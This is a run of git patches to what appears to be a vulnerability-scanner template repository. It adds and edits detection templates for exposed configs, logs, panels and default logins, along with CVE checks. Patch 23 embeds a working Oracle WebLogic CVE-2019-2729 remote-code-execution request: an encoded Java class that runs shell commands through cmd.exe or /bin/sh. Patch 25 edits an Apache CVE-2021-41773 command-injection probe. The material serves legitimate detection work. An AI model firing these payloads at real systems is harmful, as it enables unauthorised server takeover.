https://www.exploit-db.com/exploits/50414 @@ -11,6 +11,11 @@ info: metadata: google-dork: inurl:"auth.html" intitle:"SonicWall" tags: cve,cve2021,sonicwall,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-20031 + cwe-id: CWE-601 requests: - raw: From 06b38542fff0920a508faca59a6225c6d68d1f07 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Thu, 21 Oct 2021 04:11:30 +0530 Subject: [PATCH 20/39] Update jetbrains-datasources.yaml --- exposures/configs/jetbrains-datasources.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/configs/jetbrains-datasources.yaml b/exposures/configs/jetbrains-datasources.yaml index b09b7da590..2be4dd0504 100644 --- a/exposures/configs/jetbrains-datasources.yaml +++ b/exposures/configs/jetbrains-datasources.yaml @@ -1,4 +1,4 @@ -id: package-json +id: jetbrains-datasource info: name: Jetbrains IDE DataSources exposure @@ -16,7 +16,7 @@ requests: matchers: - type: word words: - - "uuid" + - "DataSourceManagerImpl" part: body - type: status From cda7245de9a7a1ebd7088a9f93063df38f0201ce Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 21 Oct 2021 04:21:52 +0530 Subject: [PATCH 21/39] misc update --- .../{gruntfile.yaml => gruntfile-exposure.yaml} | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) rename exposures/configs/{gruntfile.yaml => gruntfile-exposure.yaml} (78%) diff --git a/exposures/configs/gruntfile.yaml b/exposures/configs/gruntfile-exposure.yaml similarity index 78% rename from exposures/configs/gruntfile.yaml rename to exposures/configs/gruntfile-exposure.yaml index bac81870cb..a4fddba012 100644 --- a/exposures/configs/gruntfile.yaml +++ b/exposures/configs/gruntfile-exposure.yaml @@ -1,7 +1,7 @@ -id: gruntfile +id: gruntfile-exposure info: - name: gruntfile exposure + name: Gruntfile Exposure author: sbani severity: info reference: https://gruntjs.com/sample-gruntfile @@ -9,18 +9,20 @@ info: requests: - method: GET - redirects: true - max-redirects: 3 path: - "{{BaseURL}}/Gruntfile.js" - "{{BaseURL}}/Gruntfile.coffee" + redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word + part: body + condition: and words: - "module.exports" - part: body + - "grunt" - type: status status: From c6c171623b1112549f53f67668afe838981c1371 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 21 Oct 2021 04:24:31 +0530 Subject: [PATCH 22/39] mosc update --- exposed-panels/samsung-printer-detect.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/exposed-panels/samsung-printer-detect.yaml b/exposed-panels/samsung-printer-detect.yaml index e1d5389fa2..c4e1f09352 100644 --- a/exposed-panels/samsung-printer-detect.yaml +++ b/exposed-panels/samsung-printer-detect.yaml @@ -1,22 +1,24 @@ -id: samsung-printer-Detect +id: samsung-printer-detect + info: name: SAMSUNG Printer Detection author: pussycat0x severity: info + tags: iot,panel metadata: fofa-dork: 'app="SAMSUNG-Printer"' - tags: iot + requests: - method: GET path: - "{{BaseURL}}/sws/index.html" + matchers-condition: and matchers: - type: word words: - ' SyncThru Web Service ' - condition: and - part: body + - type: status status: - 200 \ No newline at end of file From 323da341b2584b5f6a82d82fbe3098dcd3b4f45c Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 21 Oct 2021 05:37:30 +0530 Subject: [PATCH 23/39] Added CVE-2019-2729 (Oracle WebLogic RCE) --- cves/2019/CVE-2019-2729.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2019/CVE-2019-2729.yaml diff --git a/cves/2019/CVE-2019-2729.yaml b/cves/2019/CVE-2019-2729.yaml new file mode 100644 index 0000000000..b28e4ae9bf --- /dev/null +++ b/cves/2019/CVE-2019-2729.yaml @@ -0,0 +1,32 @@ +id: CVE-2019-2729 + +info: + name: Oracle WebLogic Server Administration Console Handle RCE + author: igibanez + severity: critical + description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-2729 + tags: cve,cve2019,oracle,rce,weblogic + +requests: + - raw: + - | + POST /wls-wsat/CoordinatorPortType HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + + xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7ResultBaseExececho${IFS}9272-9102-EVC|revconnectionHandlertrue]]> + + matchers-condition: and + matchers: + + - type: word + words: + - "CVE-2019-2729" + + - type: status + status: + - 200 \ No newline at end of file From 1eaff3bfff72535c9496411ca09b8f7e4b41170c Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 21 Oct 2021 07:17:51 +0530 Subject: [PATCH 24/39] misc update --- default-logins/hp/hp-switch-default-login.yaml | 4 +--- .../idemia/idemia-biometrics-default-login.yaml | 9 ++++----- 2 files changed, 5 insertions(+), 8 deletions(-) diff --git a/default-logins/hp/hp-switch-default-login.yaml b/default-logins/hp/hp-switch-default-login.yaml index aa854686cb..beada2b11a 100644 --- a/default-logins/hp/hp-switch-default-login.yaml +++ b/default-logins/hp/hp-switch-default-login.yaml @@ -20,15 +20,13 @@ requests: username: - admin - attack: sniper - matchers-condition: and matchers: - type: word + condition: and words: - '"redirect": "/htdocs/pages/main/main.lsp"' - '"error": ""' - condition: and - type: status status: diff --git a/default-logins/idemia/idemia-biometrics-default-login.yaml b/default-logins/idemia/idemia-biometrics-default-login.yaml index 9c7aa9d12a..959da5926b 100644 --- a/default-logins/idemia/idemia-biometrics-default-login.yaml +++ b/default-logins/idemia/idemia-biometrics-default-login.yaml @@ -18,22 +18,21 @@ requests: payloads: password: - - 12345 - attack: sniper + - "12345" matchers-condition: and matchers: - type: word + condition: and words: - "session_id=" - "resource" - condition: and - type: word - words: - - "Invalid Password" part: body negative: true + words: + - "Invalid Password" - type: status status: From 56b0f60d5a26b2ad56d2b76b35263b5f3f47fb13 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 21 Oct 2021 00:57:23 -0300 Subject: [PATCH 25/39] Update CVE-2021-41773.yaml Fixes false positive due to IPS/ 'Request denied by WatchGuard Firewall.

Reason: IPS detected for "WEB Apache HTTP Server Path traversal (CVE-2021-41773)"' --- cves/2021/CVE-2021-41773.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-41773.yaml b/cves/2021/CVE-2021-41773.yaml index 473c7adbcb..4b8ac8ef2a 100644 --- a/cves/2021/CVE-2021-41773.yaml +++ b/cves/2021/CVE-2021-41773.yaml @@ -31,7 +31,7 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - echo Content-Type: text/plain; echo; echo 37714-1202-EVC | rev + echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev matchers-condition: or matchers: @@ -44,4 +44,4 @@ requests: - type: word name: RCE words: - - "CVE-2021-41773" + - "CVE-2021-41773-POC" From 691dab8a52adb6810d642cf7997495a175c4a56d Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 21 Oct 2021 08:51:56 +0300 Subject: [PATCH 26/39] Add description --- vulnerabilities/other/phpwiki-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/phpwiki-lfi.yaml b/vulnerabilities/other/phpwiki-lfi.yaml index d48b733698..0d0a84e034 100644 --- a/vulnerabilities/other/phpwiki-lfi.yaml +++ b/vulnerabilities/other/phpwiki-lfi.yaml @@ -4,6 +4,7 @@ info: name: phpwiki 1.5.4 - XSS / Local File Inclusion author: 0x_Akoko severity: high + description: A vulnerability in phpwiki allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint. reference: https://www.exploit-db.com/exploits/38027 tags: phpwiki,lfi From f1d4569a8cfe5c40b2ac2bb7c76b4c49fe995830 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 21 Oct 2021 08:52:48 +0300 Subject: [PATCH 27/39] Add description --- vulnerabilities/oracle/oracle-siebel-xss.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/oracle/oracle-siebel-xss.yaml b/vulnerabilities/oracle/oracle-siebel-xss.yaml index 19e3bc099e..3d3374470c 100644 --- a/vulnerabilities/oracle/oracle-siebel-xss.yaml +++ b/vulnerabilities/oracle/oracle-siebel-xss.yaml @@ -4,6 +4,7 @@ info: name: Oracle Siebel Loyalty 8.1 - XSS Vulnerability author: dhiyaneshDK severity: medium + description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint. reference: https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html tags: xss,oracle From 379513c0155f31cd5787ce1cc0e53fa750ec60dd Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 21 Oct 2021 08:55:02 +0300 Subject: [PATCH 28/39] Make description more clear --- vulnerabilities/other/pmb-directory-traversal.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/pmb-directory-traversal.yaml b/vulnerabilities/other/pmb-directory-traversal.yaml index 74427ef576..927daf9a9f 100644 --- a/vulnerabilities/other/pmb-directory-traversal.yaml +++ b/vulnerabilities/other/pmb-directory-traversal.yaml @@ -4,7 +4,7 @@ info: name: PMB 5.6 Directory Traversal author: geeknik severity: medium - description: The PMB Gif Image is not sanitizing the 'chemin', which leads to Local File Disclosure. + description: The PMB Gif Image is not sanitizing the content of the 'chemin' parameter, this can in turn be used to a Local File Disclosure. reference: https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html tags: lfi From 6d28009f5e618286c09f67135abecc3bc6a1f77f Mon Sep 17 00:00:00 2001 From: Sufijen Bani Date: Thu, 21 Oct 2021 09:41:25 +0200 Subject: [PATCH 29/39] Add Deeper Search for Access Logs Search access logs in more folders. This happens for error logs too. --- exposures/logs/access-log.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/exposures/logs/access-log.yaml b/exposures/logs/access-log.yaml index 16c3349ad5..324e4fe9af 100644 --- a/exposures/logs/access-log.yaml +++ b/exposures/logs/access-log.yaml @@ -10,6 +10,9 @@ requests: - method: GET path: - "{{BaseURL}}/access.log" + - "{{BaseURL}}/log/access.log" + - "{{BaseURL}}/logs/access.log" + - "{{BaseURL}}/application/logs/access.log" matchers-condition: and matchers: From 378a682a5ed45deffdd8a705b32bbe7fdcefb052 Mon Sep 17 00:00:00 2001 From: Sufijen Bani Date: Thu, 21 Oct 2021 09:45:23 +0200 Subject: [PATCH 30/39] Enhance Text Matching in Error Logs Some words are missing that normally indicate that this is an error log. --- exposures/logs/error-logs.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposures/logs/error-logs.yaml b/exposures/logs/error-logs.yaml index fef1228189..ffa763ae58 100644 --- a/exposures/logs/error-logs.yaml +++ b/exposures/logs/error-logs.yaml @@ -45,6 +45,8 @@ requests: - "script headers" - "Broken pipe" - "Array" + - "Exception" + - "Fatal" condition: or - type: word From fe4e6b8246a5562b682ee7c94b49f33c953df2be Mon Sep 17 00:00:00 2001 From: Philipp Dahse Date: Thu, 21 Oct 2021 10:14:04 +0200 Subject: [PATCH 31/39] Add Symfony Security Config Expose Template Symfony security contain information about used encryption algorithms and list which routes are protected --- .../configs/symfony-security-config.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposures/configs/symfony-security-config.yaml diff --git a/exposures/configs/symfony-security-config.yaml b/exposures/configs/symfony-security-config.yaml new file mode 100644 index 0000000000..f11db61824 --- /dev/null +++ b/exposures/configs/symfony-security-config.yaml @@ -0,0 +1,26 @@ +id: symfony-security-config + +info: + name: Symfony Security Configuration Exposure + author: dahse89 + severity: info + tags: config,exposure,symfony + reference: + - https://symfony2-document.readthedocs.io/en/latest/book/security.html + - https://symfony.com/doc/current/reference/configuration/security.html + +requests: + - method: GET + path: + - "{{BaseURL}}/config/packages/security.yaml" + - "{{BaseURL}}/app/config/security.yml" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "security:" + condition: and + part: body From ac9f713d97ec1500da40aaf42862f8e771443aa2 Mon Sep 17 00:00:00 2001 From: Sufijen Bani Date: Thu, 21 Oct 2021 10:33:49 +0200 Subject: [PATCH 32/39] Merge PHP Errors Templates There was an extra error template for PHP warnings although there was another template holding that already. The status code check (500) is a step that would make sense for all of the checks. This is not limited to warnings. Though I think that error code 500 shrinks the result set too much in this case. That's why I would leave it out. --- exposures/logs/php-warning.yaml | 25 ------------------------- misconfiguration/php-errors.yaml | 6 +++++- 2 files changed, 5 insertions(+), 26 deletions(-) delete mode 100644 exposures/logs/php-warning.yaml diff --git a/exposures/logs/php-warning.yaml b/exposures/logs/php-warning.yaml deleted file mode 100644 index 4c35a35f47..0000000000 --- a/exposures/logs/php-warning.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: php-warning - -info: - name: PHP warning - author: dhiyaneshDK - severity: low - reference: https://www.shodan.io/search?query=http.title%3A%22PHP+warning%22 - tags: exposure,php,debug - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: regex - regex: - - '(?m)^([a-z /A-Z.(0-9):]+)?PHP warning([a-z /A-Z.(0-9):]+)?<\/title>$' - - - type: status - status: - - 500 - - 503 - condition: or diff --git a/misconfiguration/php-errors.yaml b/misconfiguration/php-errors.yaml index df2a0c9ae2..2e12d8ec22 100644 --- a/misconfiguration/php-errors.yaml +++ b/misconfiguration/php-errors.yaml @@ -2,7 +2,10 @@ id: php-errors info: name: PHP errors - author: w4cky_,geeknik + author: w4cky_,geeknik,dhiyaneshDK + reference: + - https://www.shodan.io/search?query=%22Fatal+error%22 + - https://www.shodan.io/search?query=http.title%3A%22PHP+warning%22 severity: info tags: debug,php @@ -20,6 +23,7 @@ requests: - '(?i)MySQL server version for the right syntax to use near' - '(?i)MySQL cannot create a temporary file' - '(?i)PHP (Warning|Error)' + - '(?m)^<title>([a-z /A-Z.(0-9):]+)?PHP warning([a-z /A-Z.(0-9):]+)?<\/title>$' - '(?i)Warning\: (pg|mysql)_(query|connect)\(\)' - '(?i)failed to open stream\:' - '(?i)SAFE MODE Restriction in effect' From b39200b8e4b51578a89828f7defbc9cdefd449ea Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 21 Oct 2021 15:47:46 +0530 Subject: [PATCH 33/39] Update CVE-2021-33044.yaml --- cves/2021/CVE-2021-33044.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-33044.yaml b/cves/2021/CVE-2021-33044.yaml index 7797b9e08e..6af86d7e1f 100644 --- a/cves/2021/CVE-2021-33044.yaml +++ b/cves/2021/CVE-2021-33044.yaml @@ -40,7 +40,7 @@ requests: - type: word part: body words: - - "true" + - "\"result\":true" - "id" - "params" - "session" From 7cfaf6c7ddef3fec47bd723537c826585dc3c56a Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 21 Oct 2021 10:43:47 +0000 Subject: [PATCH 34/39] Auto Generated CVE annotations [Thu Oct 21 10:43:47 UTC 2021] :robot: --- cves/2016/CVE-2016-1000143.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2016/CVE-2016-1000143.yaml b/cves/2016/CVE-2016-1000143.yaml index 95cc66fabf..65b05e634d 100644 --- a/cves/2016/CVE-2016-1000143.yaml +++ b/cves/2016/CVE-2016-1000143.yaml @@ -9,6 +9,11 @@ info: - http://www.vapidlabs.com/wp/wp_advisory.php?v=780 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000143 tags: cve,cve2016,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000143 + cwe-id: CWE-79 requests: - method: GET From 7e4cd54f9e25a8dd96e0249dd74e75d5dca656ad Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Thu, 21 Oct 2021 14:13:53 +0300 Subject: [PATCH 35/39] Add description --- vulnerabilities/other/qcubed-xss.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/qcubed-xss.yaml b/vulnerabilities/other/qcubed-xss.yaml index 5309d50deb..420879092a 100644 --- a/vulnerabilities/other/qcubed-xss.yaml +++ b/vulnerabilities/other/qcubed-xss.yaml @@ -4,6 +4,7 @@ info: name: Qcubed Reflected XSS author: pikpikcu severity: medium + description: A vulnerability in Qcubed allows remote attackers to inject arbitrary Javascript via the '/assets/php/_devtools/installer/step_2.php' endpoint and the 'installation_path' parameter. reference: https://github.com/qcubed/qcubed/issues/1230 tags: xss,qcubed From ae55315ec6097964cc9262c23cf98e56570c5ddd Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Thu, 21 Oct 2021 14:15:52 +0300 Subject: [PATCH 36/39] Improve description --- vulnerabilities/other/qihang-media-lfi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/qihang-media-lfi.yaml b/vulnerabilities/other/qihang-media-lfi.yaml index a4bcd43d65..42e4aaed79 100644 --- a/vulnerabilities/other/qihang-media-lfi.yaml +++ b/vulnerabilities/other/qihang-media-lfi.yaml @@ -4,7 +4,7 @@ info: name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability author: gy741 severity: high - description: The application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources. + description: The QiHang Media Web application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources. reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php tags: qihang,lfi From 07472bb02102b98d4be0ef226a98166592b21a80 Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Thu, 21 Oct 2021 14:21:38 +0300 Subject: [PATCH 37/39] Add description --- vulnerabilities/other/sangfor-edr-auth-bypass.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/sangfor-edr-auth-bypass.yaml b/vulnerabilities/other/sangfor-edr-auth-bypass.yaml index bd15d6ff70..2e4aa14045 100644 --- a/vulnerabilities/other/sangfor-edr-auth-bypass.yaml +++ b/vulnerabilities/other/sangfor-edr-auth-bypass.yaml @@ -3,6 +3,7 @@ info: name: Sangfor EDR Authentication Bypass author: princechaddha severity: high + description: A vulnerability in Sangfor EDR allows remote attackers to access the system with 'admin' privileges by accessing the login page directly using a provided username rather than going through the login screen without providing a username. tags: sangfor,auth-bypass requests: From 0cb293abcaf17d0cfcb14a710122c1d7ae05f106 Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Thu, 21 Oct 2021 14:25:28 +0300 Subject: [PATCH 38/39] Add description --- vulnerabilities/wordpress/ultimatemember-open-redirect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml b/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml index 84f1391b8e..55110ec907 100644 --- a/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml +++ b/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml @@ -4,6 +4,7 @@ info: name: Ultimate Member < 2.1.7 - Unauthenticated Open Redirect author: 0x_Akoko severity: medium + description: The Ultimate Member WordPress plugin was vulnerable to an Unauthenticated Open Redirect vulnerability, affecting the registration and login pages where the "redirect_to" GET parameter was used. reference: https://wpscan.com/vulnerability/97823f41-7614-420e-81b8-9e735e4c203f tags: wp-plugin,redirect,wordpress From 197c550fcec239ef985abbaa35271a4debcce0a1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 21 Oct 2021 19:19:21 +0530 Subject: [PATCH 39/39] Update symfony-security-config.yaml --- exposures/configs/symfony-security-config.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/exposures/configs/symfony-security-config.yaml b/exposures/configs/symfony-security-config.yaml index f11db61824..f1365ebe3d 100644 --- a/exposures/configs/symfony-security-config.yaml +++ b/exposures/configs/symfony-security-config.yaml @@ -4,23 +4,27 @@ info: name: Symfony Security Configuration Exposure author: dahse89 severity: info - tags: config,exposure,symfony reference: - https://symfony2-document.readthedocs.io/en/latest/book/security.html - https://symfony.com/doc/current/reference/configuration/security.html + tags: config,exposure,symfony requests: - method: GET path: - "{{BaseURL}}/config/packages/security.yaml" - "{{BaseURL}}/app/config/security.yml" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "security:" + - "firewalls:" + - "access_control:" condition: and part: body